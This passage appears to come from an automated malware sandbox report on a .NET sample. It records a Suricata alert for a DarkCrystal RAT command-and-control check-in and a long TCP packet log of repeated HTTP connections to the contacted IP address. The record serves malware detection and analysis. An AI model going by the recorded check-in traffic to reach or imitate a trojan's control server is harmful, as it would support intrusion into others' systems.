                                                                RT_VERSION0x3660580x2c8data0.46207865168539325

                                                                Imports

                                                                DLLImport
                                                                mscoree.dll_CorExeMain

                                                                Network Behavior

                                                                Suricata IDS Alerts

                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-10-11T01:36:29.442306+02002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.549760188.114.96.380TCP

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 11, 2024 01:36:28.910631895 CEST4976080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:28.915608883 CEST8049760188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:28.917424917 CEST4976080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:28.918380022 CEST4976080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:28.923265934 CEST8049760188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:29.270709038 CEST4976080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:29.275763035 CEST8049760188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:29.359807014 CEST8049760188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:29.442306042 CEST4976080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:29.627648115 CEST8049760188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:29.627715111 CEST8049760188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:29.627759933 CEST4976080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:29.741601944 CEST4976080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:29.746516943 CEST8049760188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:29.832793951 CEST4976680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:29.835189104 CEST8049760188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:29.835593939 CEST4976080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:29.837603092 CEST8049766188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:29.837667942 CEST4976680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:29.837759018 CEST4976680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:29.840404034 CEST8049760188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:29.842513084 CEST8049766188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:30.091778994 CEST8049760188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:30.191776037 CEST4976680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:30.196719885 CEST8049766188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:30.196763039 CEST8049766188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:30.196770906 CEST8049766188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:30.238569975 CEST4976080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:30.288947105 CEST4976080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:30.293142080 CEST8049766188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:30.293765068 CEST8049760188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:30.382365942 CEST8049760188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:30.386409998 CEST4976080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:30.391180992 CEST8049760188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:30.391705990 CEST8049760188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:30.410438061 CEST4976680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:30.544817924 CEST8049766188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:30.613570929 CEST4976680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:30.655797005 CEST8049760188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:30.692975044 CEST4977280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:30.694613934 CEST4976080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:30.694716930 CEST4976680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:30.697767973 CEST8049772188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:30.699728012 CEST8049760188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:30.699780941 CEST4976080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:30.700128078 CEST8049766188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:30.700151920 CEST4977280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:30.700167894 CEST4976680192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:30.702291965 CEST4977280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:30.707045078 CEST8049772188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:31.051394939 CEST4977280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:31.056309938 CEST8049772188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:31.056320906 CEST8049772188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:31.056329966 CEST8049772188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:31.163455009 CEST8049772188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:31.314290047 CEST4977280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:31.416073084 CEST8049772188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:31.417254925 CEST4977280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:31.422643900 CEST8049772188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:31.422727108 CEST4977280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:31.586448908 CEST4978080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:31.591443062 CEST8049780188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:31.591533899 CEST4978080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:31.591635942 CEST4978080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:31.596508980 CEST8049780188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:31.671117067 CEST4978180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:31.676167965 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:31.676393032 CEST4978180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:31.676393032 CEST4978180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:31.677869081 CEST4978080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:31.681277990 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:31.723005056 CEST8049780188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:31.841583014 CEST4978280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:31.846630096 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:31.846709013 CEST4978280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:31.846874952 CEST4978280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:31.851660967 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:31.954282999 CEST8049780188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:31.958312035 CEST4978080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:32.036931992 CEST4978180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:32.041790009 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.041977882 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.129529953 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.204158068 CEST4978280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:32.209280968 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.209310055 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.209348917 CEST4978280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:32.209363937 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.209369898 CEST4978280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:32.209393024 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.209415913 CEST4978280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:32.209420919 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.209436893 CEST4978280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:32.209448099 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.209471941 CEST4978280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:32.209489107 CEST4978280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:32.209496021 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.209523916 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.209551096 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.209573984 CEST4978280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:32.209575891 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.209599972 CEST4978280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:32.209624052 CEST4978280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:32.214489937 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.214518070 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.214569092 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.214571953 CEST4978280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:32.214596033 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.214621067 CEST4978280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:32.214623928 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.214651108 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.214657068 CEST4978280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:32.214668036 CEST4978280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:32.214683056 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.214730978 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.214756012 CEST4978280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:32.214788914 CEST4978280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:32.219712973 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.220001936 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.220093966 CEST4978280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:32.220112085 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.220316887 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.220344067 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.220371962 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.220385075 CEST4978280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:32.220401049 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.220422029 CEST4978280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:32.220428944 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.220448971 CEST4978280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:32.220457077 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.220465899 CEST4978280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:32.220484972 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.220511913 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.220537901 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.220540047 CEST4978280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:32.220556974 CEST4978280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:32.220565081 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.220587015 CEST4978280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:32.220592022 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.220609903 CEST4978280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:32.225079060 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.225107908 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.225133896 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.225181103 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.225208044 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.225234032 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.225260019 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.225435019 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.225461960 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.225626945 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.225652933 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.225797892 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.225825071 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.225855112 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.225900888 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.225966930 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.225994110 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.226079941 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.226106882 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.226154089 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.226180077 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.226227045 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.226253986 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.226300955 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.226326942 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.226352930 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.226378918 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.226428986 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.226454973 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.226480961 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.226506948 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.226552963 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.226579905 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.226604939 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.226635933 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.226713896 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.226739883 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.226787090 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.226813078 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.226907969 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.226933002 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.226963043 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.227009058 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.227035999 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.227065086 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.227111101 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.227137089 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.227183104 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.227209091 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.227235079 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.227262020 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.227309942 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.227335930 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.227360964 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.227406025 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.227472067 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.227499008 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.227524996 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.227571011 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.227596998 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.227627993 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.296217918 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.334258080 CEST4978180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:32.410409927 CEST4978280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:32.411843061 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.500174999 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.500282049 CEST4978180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:32.500686884 CEST4978180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:32.505491018 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.596971035 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.597126007 CEST4978180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:32.602010012 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.602024078 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.602029085 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.847775936 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.848304987 CEST4978180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:32.853301048 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.944576979 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.944839001 CEST4978180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:32.949995041 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:32.950047970 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:33.253386974 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:33.253664970 CEST4978180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:33.258725882 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:33.350882053 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:33.351051092 CEST4978180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:33.357434034 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:33.357475996 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:33.357505083 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:33.404448986 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:33.456624985 CEST4978280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:33.458167076 CEST4979580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:33.461951017 CEST8049782188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:33.462027073 CEST4978280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:33.463063002 CEST8049795188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:33.463141918 CEST4979580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:33.463356018 CEST4979580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:33.468281984 CEST8049795188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:33.655471087 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:33.655783892 CEST4978180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:33.660671949 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:33.751580000 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:33.751743078 CEST4978180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:33.756831884 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:33.756869078 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:33.816741943 CEST4979580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:33.822031021 CEST8049795188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:33.932378054 CEST8049795188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:33.972908020 CEST4979580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:34.053121090 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:34.053776979 CEST4978180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:34.058653116 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:34.149255991 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:34.149403095 CEST4978180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:34.154304981 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:34.154323101 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:34.154339075 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:34.179050922 CEST8049795188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:34.183630943 CEST4979580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:34.188622952 CEST8049795188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:34.281801939 CEST8049795188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:34.281935930 CEST4979580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:34.286955118 CEST8049795188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:34.286993980 CEST8049795188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:34.287029028 CEST8049795188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:34.408701897 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:34.409012079 CEST4978180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:34.413844109 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:34.504760027 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:34.504957914 CEST4978180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:34.509891987 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:34.510121107 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:34.545943022 CEST8049795188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:34.597965956 CEST4979580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:34.797743082 CEST8049795188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:34.797815084 CEST4979580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:34.798048973 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:34.798899889 CEST4978180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:34.803807020 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:34.901029110 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:34.904246092 CEST4978180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:34.909260035 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:34.909291983 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:34.909318924 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:34.912986040 CEST4979580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:34.917051077 CEST4980580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:34.918457985 CEST8049795188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:34.922128916 CEST8049805188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:34.922219992 CEST4979580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:34.922235966 CEST4980580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:34.925398111 CEST4980580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:34.930303097 CEST8049805188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:35.165321112 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:35.222867012 CEST4978180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:35.269998074 CEST4980580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:35.275188923 CEST8049805188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:35.275223970 CEST8049805188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:35.342305899 CEST4978180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:35.346627951 CEST4981180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:35.347963095 CEST8049781188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:35.348011017 CEST4978180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:35.351560116 CEST8049811188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:35.354262114 CEST4981180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:35.354640007 CEST4981180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:35.359466076 CEST8049811188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:35.386348963 CEST8049805188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:35.441693068 CEST4980580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:35.655703068 CEST8049805188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:35.707252026 CEST4980580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:35.707324028 CEST4981180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:35.712340117 CEST8049811188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:35.712357998 CEST8049811188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:35.712369919 CEST8049811188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:35.770366907 CEST4980580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:35.775228024 CEST8049805188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:35.835129976 CEST8049811188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:35.868626118 CEST8049805188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:35.868817091 CEST4980580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:35.873836040 CEST8049805188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:35.873851061 CEST8049805188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:35.879115105 CEST4981180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:36.066507101 CEST8049811188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:36.113506079 CEST4981180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:36.158477068 CEST8049811188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:36.176870108 CEST8049805188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:36.207245111 CEST4981180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:36.222877026 CEST4980580192.168.2.5188.114.96.3
